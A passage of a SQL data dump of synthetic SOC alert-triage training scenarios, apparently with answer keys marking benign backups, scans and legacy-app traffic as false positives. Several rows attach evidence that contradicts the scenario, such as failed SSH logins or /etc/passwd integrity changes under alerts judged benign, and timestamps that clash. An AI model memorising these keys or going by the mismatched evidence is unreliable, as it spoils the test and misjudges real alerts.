3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.10\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"it_admin\\\",\\\"hostname\\\":\\\"healthcheck-server\\\",\\\"command_line\\\":\\\"python3 /scripts/system_health_check.py\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.312Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.10\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"it_admin\\\",\\\"hostname\\\":\\\"healthcheck-server\\\",\\\"command_line\\\":\\\"python3 /scripts/system_health_check.py\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1799, 'Authorized Administrative Backup Misclassified as Data Exfiltration', 'medium', 'Elastic SIEM', 'A scheduled administrative backup to an external cloud storage was flagged as potential data exfiltration.', 'Data Exfil', 'T1020', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T07:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"198.51.100.25\",\"username\":\"backup_service\",\"hostname\":\"backup-server\",\"request_body\":\"Scheduled backup operation\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for regular backup operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Known cloud storage provider domain used for authorized backups.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"backup_service\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Standard service account for backup operations.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The destination IP is a known cloud storage used for legitimate backup processes.\"}', 'Intermediate', 'SIEM', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.314Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T07:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"198.51.100.25\\\",\\\"username\\\":\\\"backup_service\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"request_body\\\":\\\"Scheduled backup operation\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.314Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T07:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"198.51.100.25\\\",\\\"username\\\":\\\"backup_service\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"request_body\\\":\\\"Scheduled backup operation\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.314Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T07:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"198.51.100.25\\\",\\\"username\\\":\\\"backup_service\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"request_body\\\":\\\"Scheduled backup operation\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.314Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T07:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"198.51.100.25\\\",\\\"username\\\":\\\"backup_service\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"request_body\\\":\\\"Scheduled backup operation\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.314Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T07:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"198.51.100.25\\\",\\\"username\\\":\\\"backup_service\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"request_body\\\":\\\"Scheduled backup operation\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1800, 'Misconfigured Legacy App Triggering Lateral Movement Alert', 'medium', 'Wazuh', 'A legacy application performing inter-server communication was flagged as lateral movement due to outdated protocols.', 'Lateral Movement', 'T1021', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.22\",\"dst_ip\":\"10.0.0.23\",\"username\":\"legacy_app\",\"hostname\":\"server-old\",\"command_line\":\"/usr/bin/legacy_tool --connect\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"/usr/bin/legacy_tool --connect\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"Command associated with known legacy application.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.22\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of legacy server.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of server communication target.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The legacy application is known to use outdated protocols which can appear suspicious.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.317Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.22\\\",\\\"dst_ip\\\":\\\"10.0.0.23\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"server-old\\\",\\\"command_line\\\":\\\"/usr/bin/legacy_tool --connect\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.317Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.22\\\",\\\"dst_ip\\\":\\\"10.0.0.23\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"server-old\\\",\\\"command_line\\\":\\\"/usr/bin/legacy_tool --connect\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.317Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.22\\\",\\\"dst_ip\\\":\\\"10.0.0.23\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"server-old\\\",\\\"command_line\\\":\\\"/usr/bin/legacy_tool --connect\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.317Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.22\\\",\\\"dst_ip\\\":\\\"10.0.0.23\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"server-old\\\",\\\"command_line\\\":\\\"/usr/bin/legacy_tool --connect\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.317Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.22\\\",\\\"dst_ip\\\":\\\"10.0.0.23\\\",\\\"username\\\":\\\"legacy_app\\\",\\\"hostname\\\":\\\"server-old\\\",\\\"command_line\\\":\\\"/usr/bin/legacy_tool --connect\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1801, 'Routine IT Vulnerability Scan Misinterpreted as Brute Force Attack', 'low', 'Azure Sentinel', 'A scheduled vulnerability scan using internal security tools was incorrectly flagged as a brute force attack due to multiple login attempts.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:00:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"10.0.0.30\",\"dst_ip\":\"10.0.0.40\",\"username\":\"scan_user\",\"hostname\":\"vuln-scan-server\",\"request_body\":\"Multiple login attempts detected\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"IP address used by internal vulnerability scanning tool.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.40\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Target IP of routine vulnerability scan.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"scan_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Account used for authorized vulnerability scans.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The activity corresponds with the scheduled vulnerability scans performed by IT.\"}', 'Intermediate', 'SIEM', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.319Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T14:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.30\\\",\\\"dst_ip\\\":\\\"10.0.0.40\\\",\\\"username\\\":\\\"scan_user\\\",\\\"hostname\\\":\\\"vuln-scan-server\\\",\\\"request_body\\\":\\\"Multiple login attempts detected\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.319Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T14:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.30\\\",\\\"dst_ip\\\":\\\"10.0.0.40\\\",\\\"username\\\":\\\"scan_user\\\",\\\"hostname\\\":\\\"vuln-scan-server\\\",\\\"request_body\\\":\\\"Multiple login attempts detected\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.319Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T14:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.30\\\",\\\"dst_ip\\\":\\\"10.0.0.40\\\",\\\"username\\\":\\\"scan_user\\\",\\\"hostname\\\":\\\"vuln-scan-server\\\",\\\"request_body\\\":\\\"Multiple login attempts detected\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.319Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T14:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.30\\\",\\\"dst_ip\\\":\\\"10.0.0.40\\\",\\\"username\\\":\\\"scan_user\\\",\\\"hostname\\\":\\\"vuln-scan-server\\\",\\\"request_body\\\":\\\"Multiple login attempts detected\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.319Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T14:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.0.30\\\",\\\"dst_ip\\\":\\\"10.0.0.40\\\",\\\"username\\\":\\\"scan_user\\\",\\\"hostname\\\":\\\"vuln-scan-server\\\",\\\"request_body\\\":\\\"Multiple login attempts detected\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1802, 'Benign Network Monitoring Misidentified as Phishing Attempt', 'low', 'Splunk', 'Network monitoring packets were mistakenly flagged as a phishing attempt due to heuristic matching of packet metadata.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T16:25:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.50\",\"dst_ip\":\"10.0.0.60\",\"username\":\"net_monitor\",\"hostname\":\"monitor-server\",\"request_body\":\"Routine network monitoring packet\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"IP address of network monitoring tool.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.60\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Destination IP for network monitoring packets.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The flagged activity is consistent with normal network monitoring operations.\"}', 'Intermediate', 'SIEM', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.321Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T16:25:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.50\\\",\\\"dst_ip\\\":\\\"10.0.0.60\\\",\\\"username\\\":\\\"net_monitor\\\",\\\"hostname\\\":\\\"monitor-server\\\",\\\"request_body\\\":\\\"Routine network monitoring packet\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.321Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T16:25:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.50\\\",\\\"dst_ip\\\":\\\"10.0.0.60\\\",\\\"username\\\":\\\"net_monitor\\\",\\\"hostname\\\":\\\"monitor-server\\\",\\\"request_body\\\":\\\"Routine network monitoring packet\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.321Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T16:25:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.50\\\",\\\"dst_ip\\\":\\\"10.0.0.60\\\",\\\"username\\\":\\\"net_monitor\\\",\\\"hostname\\\":\\\"monitor-server\\\",\\\"request_body\\\":\\\"Routine network monitoring packet\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.321Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T16:25:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.50\\\",\\\"dst_ip\\\":\\\"10.0.0.60\\\",\\\"username\\\":\\\"net_monitor\\\",\\\"hostname\\\":\\\"monitor-server\\\",\\\"request_body\\\":\\\"Routine network monitoring packet\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.321Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T16:25:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.50\\\",\\\"dst_ip\\\":\\\"10.0.0.60\\\",\\\"username\\\":\\\"net_monitor\\\",\\\"hostname\\\":\\\"monitor-server\\\",\\\"request_body\\\":\\\"Routine network monitoring packet\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1803, 'Routine IT Vulnerability Scanning Detected', 'low', 'Splunk', 'A vulnerability scan was detected originating from an internal IT system. This activity is part of scheduled security assessments.', 'Lateral Movement', 'T1046', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:15:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.1.5\",\"dst_ip\":\"192.168.1.100\",\"username\":\"admin_scan\",\"hostname\":\"IT-SCAN-01\",\"command_line\":\"nmap -sV 192.168.1.0/24\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for vulnerability scanning\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin_scan\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"clean\",\"details\":\"Authorized scanning account\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"This alert was generated by routine IT security scans and poses no threat.\"}', 'Intermediate', 'SIEM', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.322Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.1.5\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin_scan\\\",\\\"hostname\\\":\\\"IT-SCAN-01\\\",\\\"command_line\\\":\\\"nmap -sV 192.168.1.0/24\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.322Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.1.5\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin_scan\\\",\\\"hostname\\\":\\\"IT-SCAN-01\\\",\\\"command_line\\\":\\\"nmap -sV 192.168.1.0/24\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.322Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.1.5\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin_scan\\\",\\\"hostname\\\":\\\"IT-SCAN-01\\\",\\\"command_line\\\":\\\"nmap -sV 192.168.1.0/24\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.322Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.1.5\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin_scan\\\",\\\"hostname\\\":\\\"IT-SCAN-01\\\",\\\"command_line\\\":\\\"nmap -sV 192.168.1.0/24\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.322Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:15:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.1.5\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin_scan\\\",\\\"hostname\\\":\\\"IT-SCAN-01\\\",\\\"command_line\\\":\\\"nmap -sV 192.168.1.0/24\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1804, 'Authorized Administrative Backup Process Detected', 'low', 'Wazuh', 'A backup process executed by an IT administrator was detected. This is a regular operation for data protection.', 'Persistence', 'T1053', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.15\",\"username\":\"backup_admin\",\"hostname\":\"BACKUP-SERVER-01\",\"command_line\":\"rsync -avz /data /backup\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for backup operations\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"rsync -avz /data /backup\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Scheduled backup command executed by an authorized user\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"persistence\",\"analysis_notes\":\"The detected process is a part of the scheduled backup routine and is not malicious.\"}', 'Intermediate', 'SIEM', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.323Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"BACKUP-SERVER-01\\\",\\\"command_line\\\":\\\"rsync -avz /data /backup\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.323Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"BACKUP-SERVER-01\\\",\\\"command_line\\\":\\\"rsync -avz /data /backup\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.323Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"BACKUP-SERVER-01\\\",\\\"command_line\\\":\\\"rsync -avz /data /backup\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.323Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"BACKUP-SERVER-01\\\",\\\"command_line\\\":\\\"rsync -avz /data /backup\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.323Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"BACKUP-SERVER-01\\\",\\\"command_line\\\":\\\"rsync -avz /data /backup\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
